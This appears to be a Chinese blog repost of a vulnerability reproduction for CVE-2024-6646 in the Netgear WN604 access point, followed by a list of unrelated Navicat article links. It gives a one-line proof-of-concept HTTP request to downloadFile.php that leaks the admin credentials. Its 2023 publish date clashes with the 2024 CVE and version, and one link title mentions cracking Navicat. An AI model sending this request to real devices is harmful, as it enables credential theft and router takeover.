博客
关于我
Netgear WN604 downloadFile.php 信息泄露漏洞复现(CVE-2024-6646)
阅读量:794 次
发布时间:2023-02-14

本文共 492 字,大约阅读时间需要 1 分钟。

0x01 NETGEAR WN604 产品简介

NETGEAR WN604由NETGEAR公司生产,是一款支持Wi-Fi保护协议(WPA2-PSK, WPA-PSK)和有线等效加密(WEP)64位、128位和152位的无线接入器。此外,该设备还支持MAC地址认证、802.1x RADIUS以及EAP TLS、TTLS、PEAP等安全机制,为用户提供了全面的网络安全保障。

0x02 漏洞概述

在Netgear WN604的downloadFile.php接口中发现了一个信息泄露漏洞。攻击者可通过远程方式获取无线路由器的管理员账号密码,进而控制路由器后台,可能对无线网络造成破坏或发起进一步的威胁。

0x03 影响范围

该漏洞影响Netgear WN604版本号小于等于20240710的设备。

0x04 复现环境

设备运行环境包括:主机名为"Netgear",并支持相关的网络配置。

0x05 漏洞复现

PoC(Proof of Concept)代码如下:

GET /downloadFile.php?file=config HTTP/1.1  Host: User-Agent:

转载地址:http://rbcfk.baihongyu.com/

你可能感兴趣的文章
navicat 自动关闭_干掉Navicat!MySQL官方客户端到底行不行?
查看>>
Navicat 设置时间默认值(当前最新时间)
查看>>
navicat 连接远程mysql
查看>>
navicat:2013-Lost connection to MySQL server at ‘reading initial communication packet解决方法
查看>>
Navicate for mysql 数据库设计-数据库分析
查看>>
Navicat下载和破解以及使用
查看>>
Navicat中怎样将SQLServer的表复制到MySql中
查看>>
navicat创建连接 2002-can‘t connect to server on localhost(10061)且mysql服务已启动问题
查看>>
Navicat可视化界面导入SQL文件生成数据库表
查看>>
Navicat向sqlserver中插入数据时提示:当 IDENTITY_INSERT 设置为 OFF 时,不能向表中的标识列插入显式值
查看>>
Navicat因导入的sql文件中时间数据类型有参数而报错的原因(例:datetime(3))
查看>>
Navicat如何连接MySQL
查看>>
navicat导入.sql文件出错2006- MySQLserver has gone away
查看>>
Navicat导入海量Excel数据到数据库(简易介绍)
查看>>
Navicat工具Oracle数据库复制 or 备用、恢复功能(评论都在谈论需要教)
查看>>
navicat工具查看MySQL数据库_表占用容量_占用空间是多少MB---Linux工作笔记048
查看>>
navicat怎么导出和导入数据表
查看>>
Navicat报错connection is being used
查看>>
Navicat报错:1045-Access denied for user root@localhost(using passwordYES)
查看>>
Navicat控制mysql用户权限
查看>>